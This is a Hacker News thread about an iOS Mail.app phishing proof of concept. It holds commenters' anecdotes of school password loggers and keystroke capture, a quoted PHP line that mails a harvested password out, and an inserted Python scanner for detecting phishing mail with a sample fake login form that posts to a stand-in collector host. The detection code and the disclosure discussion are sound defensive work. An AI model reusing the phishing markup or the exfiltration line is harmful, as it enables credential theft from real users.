iOS 8.3 Mail.app inject kit (github.com)
200 points by diafygi on June 10, 2015 | 38 comments

I've always been a little worried when using iOS8 because the popup to input usernames/passwords/passcodes looked very poorly designed by Apple's standards - there's an odd border around some very square text inputs, and the placeholder text is misaligned and not capitalised properly.

If I were more paranoid about the security of my phone I probably wouldn't have used these inputs because they seem a lot like a phishing attack - but I risked it and assumed it's just a bug or lazy reviewer at Apple.

I've also always been worried about that dialog since it pops up at the most random times, when some background iCloud connection fails or whatever and it guesses that it's an authentication issue rather than a network one. I've seen it show up on the homescreen, Safari, etc. I'm sure users are way too desensitized to those dialogs now.

They should at the very least bounce you to Settings.app instead of showing the dialog inside whatever app you're using.

This 10000X over! I try to never enter my password into those prompts unless I know what caused it to pop. Apple has failed MASSIVELY by popping it all the time for any number of things. They need to explain better WHY they need it again because every time I see it I know it could be a fake one or one being used to just harvest my PW instead of log me into anything.

When an app pops up and asks for my Facebook or Gmail, it's stupid that there is no equivalent guarantee like seeing the Facebook or Gmail URL in a separate window where you are filling out your password. Any iOS app that asks for access to an app can harvest passwords. No?

Oh, this stuff is fun. In high school, I made a WScript that prompted user "Network timed out on line #6. Please re-enter password:" and would surreptitiously record it. I put this on a floppy, popped it in when someone in the library went to the printer, waited, came back and said, "sorry forgot my floppy; can i get it, excuse me". Didn't use it maliciously; usually would just modify the folder settings on their home drive on the network to have repeating images of Pokemon as a background image. I suppose this all sounds quite devious in writing.

I also made a password logger in high school (like presumably a great many bored kids). The network was all DOS machines where you used a command line tool to manually log in to a Novell server. There was no security in that system, so I wrote a simple wrapper that looked like the Novell login tool, saved the passwords and then shelled out to the real thing to provide access.

I didn't use the passwords for anything... But there was a guy in another class whose password was the name of the girl on whom I had a crush too. Illicit knowledge bred jealousy! Neither of us ever got the girl.

Net Send was another nice temptation to the average teenager troll.

As an admin, I really miss Net Send. I would love to have a simple way to send messages to users, especially in an emergency (like the office internet going out) so I don't get told 20 times.

It sucks that they deprecated it. I wish it were still around, maybe we could have it disabled by default, and just use a GPO to enable it.

If I need to get a message to a machine or troll someone, I do a psexec -s cmd to their box, then do: msg * "insert message here"

Are you me?

I did the very same thing ~20 years ago. I used DOS Terminate and Stay Resident (TSR) code to achieve this, I didn't have to fake any screen. The key strokes were stored in a file.

I still remember the keyboard interrupt value (0x9) from registering the TSR code.

Was it with a Novell network? 'cuz I remember their login being paranoid and starting to emit beeps with a TSR hooked on the keyboard interrupt. Or maybe it was just sloppy coding from 12-year-old me :)

I did the same except that I put the file onto a network drive so that I could access it from a less conspicuous location. Also, made a crude chat program in a similar manner.

I used to use a discussion forum website that didn't encrypt cookies. A friend created a 1x1 pixel transparent flash app that read everyone's user name and password and transmitted it to him.

That brings back memories, I did exactly the same too. The logins were shared with the Windows machines so after nabbing the password of our maths teacher, a few friends and I went through his account vandalising his PowerPoint slides to add subtle nonsense. Poor guy didn't know what on earth was going on during his lectures. Also found out the 'debug' login for the switches and used it to rather destructively mess with the network, much to the chagrin of the sysadmins. Good times!

Hey, at least you had passwords. The network in my school district just used an invisible drive to store everything. If you manually navigated to something like h: or g: (can't remember) you'd suddenly have full access to every person in the school's home directory.

Chalk me up as another person who did exactly the same thing (Novell and everything), only I got expelled for it.

Not the same thing but in middle school we used our "id numbers" for passwords everywhere. They were also helpfully printed on all of our schedules, which a number of students simply slid into the front see-through plastic sleeve on their binders, making it trivial to get nearly anyone's password. I wanted to see if there was a pattern to the id numbers (to see if given some info I could guess the id number) so I started collecting them passively. Just writing down the name of the student and their id number and storing them all in a program called HyperStudio (this was like PowerPoint for Mac but much more kid friendly and with easier scripting) which I hid behind a number of hidden buttons on a project that looked legit (no clue why I did this, I could have just stored them in a text file but I wanted to play with HS some more and hiding them felt more fun).

I never got to the point that I could discern any pattern because I very stupidly read off a student's id number when they pissed me off, for shock value (I was in middle school, cut me a break), and they told the teacher and by the end of the day I was sitting in the principal's office. I got in a bit of trouble and lost computer access for the rest of the year (that really sucked) but I'm just glad it didn't happen in today's climate where I probably could have been charged with computer hacking/fraud charges. Like elwell I never once considered using it for malicious reasons and honestly I only logged into 1-2 accounts to confirm they worked; the vast majority I had no interest in looking at their network share folder (they were just full of a bunch of school assignments after all). Looking back it was extremely stupid and could have resulted in much worse consequences. That said I stand by my opinion at the time that they were blowing it WAY out of proportion and used the word "hacked" a number of times when really all I did was observe data that students were exposing right on the outside of their binders.

I only lost computer access because I stored the numbers on a computer, which to me at the time and now seems like some pretty stupid reasoning, but whatever.

The demo video is pretty convincing.

Yes, this is pretty bad for Apple, I wonder if they will find a way to extort this poor man to remove it.

I also liked the fact YouTube started to play "New iOS 8 Mail App: Here's Why It Is Impressive!" video automatically after that video.

Apple and other companies have had plenty of worse vulnerabilities for their operating systems exposed and there is not any evidence that extortion took place afterwards for someone to go quiet.

Did this guy e-mail Apple product security?

My experience with product-security@apple.com was that they sat on my report without doing anything for several months, then finally put together a fix after I threatened to go public.

It sounds like this guy may have skipped the threatening step and just went public.

Apparently filed a Radar report on Jan 15, 2015.

And every time it's tested:

"mail('product-security@apple.com','Apple ID Password',"Thanks for your password! \n $data ¯\_(ツ)_/¯ \n https://github.com/jansoucek/iOS-Mail.app-inject-kit");"

[1]: https://github.com/jansoucek/iOS-Mail.app-inject-kit/blob/ma...

Smart and cheeky at the same time, like it!

Wouldn't one fix be for native modals (not created by web content) to have a distinguishing feature? For example, native modal backgrounds could use your home screen background with reduced opacity and blur. This could mitigate these types of phishing attacks since emulating the look and feel in web (html/css) would be difficult.

There's a thing in scam popups and emails - they are left not-perfect so that they can weed out the easier targets. I'm not sure if it is 100% applicable on this situation, but maybe there's something to it.

"We care about security - but only when there's a public exploit." - Apple

In the university's computer labs I modified Firefox. It injected JavaScript at the header. This JS was sending everything typed in Firefox to my server. It was nice to read other people's conversations (only the one side of course). Normally most computers' BIOS was password protected. These ones were left without BIOS protection, so I was able to run Linux from a USB drive and modify the Program Files folder on C:\

I think a good idea would be to include a personal image in the popups, for example the user's profile image.

Interesting bug, but I'd call the title a bit of an exaggeration. The mail app doesn't 'allow' harvesting Apple IDs, it allows unexpected content to be displayed in emails, and the author shows a proof of concept of using that for relatively convincing phishing.

You may not fall for this -- but a good section of non-technical people would. Harvesting is not an exaggeration.

A good section of non-technical people would fall for the same thing if presented from any random website in Safari (especially with iOS's predilection towards random password popups from background processes...). Not trying to downplay the issue, just provide some perspective.

One big difference is that by tying it to the email client, you're already showing the target's email address pre-filled, just like the legit prompt would. Plus, you can specifically target an individual and show the prompt without needing to convince them to visit a webpage first.
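The thread's point is that a fake login prompt carried inside an HTML e-mail needs only two things to work: a password field and somewhere off-host to post it. Those are also exactly what a mail gateway or a forensic triage script can look for without knowing how a given client renders the message. The following is an added example, not code from the thread or from the inject-kit repository: it parses a raw RFC 822 message with Python's standard library, walks the text/html parts, and flags password inputs, forms whose action points outside the sender's domain, and inline script. The sample messages, the `example.com`/`collector.invalid` domains and the thresholds are constructed for the demonstration and are not from the page.

```python
"""Flag HTML e-mail parts that carry credential-harvesting markup.

Added example, not code from the thread or the inject-kit repository.
It assumes nothing about how Mail.app renders injected content; it only
scans a raw message for markup a convincing fake login prompt needs.
"""
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse


class _CredentialMarkupScanner(HTMLParser):
    """Collect password inputs, form targets and script tags from HTML."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "script":
            self.scripts += 1


def html_parts(raw_message: str):
    """Yield decoded text/html bodies from a raw message (multipart-aware)."""
    msg = message_from_string(raw_message)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            payload = part.get_payload(decode=True)
            charset = part.get_content_charset() or "utf-8"
            yield payload.decode(charset, errors="replace")


def _is_sender_host(host: str, sender_domain: str) -> bool:
    """True if host is the sender's domain or a subdomain of it."""
    return bool(sender_domain) and (
        host == sender_domain or host.endswith("." + sender_domain)
    )


def scan_message(raw_message: str) -> dict:
    """Return findings for one message; 'suspicious' is the overall verdict."""
    msg = message_from_string(raw_message)
    sender = parseaddr(msg.get("From", ""))[1]
    sender_domain = sender.rpartition("@")[2].lower()
    findings = {"password_inputs": 0, "external_form_hosts": [], "scripts": 0}
    for html in html_parts(raw_message):
        s = _CredentialMarkupScanner()
        s.feed(html)
        findings["password_inputs"] += s.password_inputs
        findings["scripts"] += s.scripts
        for action in s.form_actions:
            host = (urlparse(action).hostname or "").lower()
            # The key signal: a fake "Apple ID" prompt has to ship the
            # password somewhere the attacker controls, i.e. off the
            # sender's own domain.
            if host and not _is_sender_host(host, sender_domain):
                findings["external_form_hosts"].append(host)
    findings["suspicious"] = (
        findings["password_inputs"] > 0 or bool(findings["external_form_hosts"])
    )
    return findings


# Constructed samples (fictional domains): a multipart message whose HTML
# part imitates a sign-in prompt and posts to a third party, and a benign one.
SAMPLE_PHISH = """\
From: "Apple" <noreply@example.com>
To: victim@example.org
Subject: Your Apple ID needs verification
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Please verify your Apple ID.
--b1
Content-Type: text/html; charset=utf-8

<html><body><div class="alert"><p>Sign in to iCloud</p>
<form action="https://collector.invalid/grab.php" method="post">
<input type="text" name="id" value="victim@example.org">
<input type="password" name="pw"><input type="submit" value="OK">
</form></div></body></html>
--b1--
"""

SAMPLE_BENIGN = """\
From: newsletter@example.com
To: victim@example.org
Subject: Weekly digest
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><body><p>Nothing to sign into here.</p>
<a href="https://example.com/read">Read more</a></body></html>
"""

if __name__ == "__main__":
    print(scan_message(SAMPLE_PHISH))
    print(scan_message(SAMPLE_BENIGN))
```

The check deliberately keys on the sender's domain rather than on a blocklist: a phishing form that posts back to the sender's own host is not flagged, which is the right trade-off for a gateway filter (a legitimate mailer occasionally embeds a form) and the wrong one for a hunt, where every password field in mail is worth a look regardless of target.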

We changed the title to that of the page. Submitted title was "iOS Mail App Allows Harvesting Apple IDs".

When submitting, please follow the guidelines and use the original title unless it is misleading or linkbait.

Well, lucky me, I don't use Mail App. I'm using the GMail App

Apple security really is the laughing stock of the info security world these days.

First the SMS of doom that could crash any iOS or Mac device, now this. Seriously though, thanks for the fappening!

If all you need are those two vulnerabilities to be a laughing stock of the security world then would not every operating system and major piece of software fit that bill?
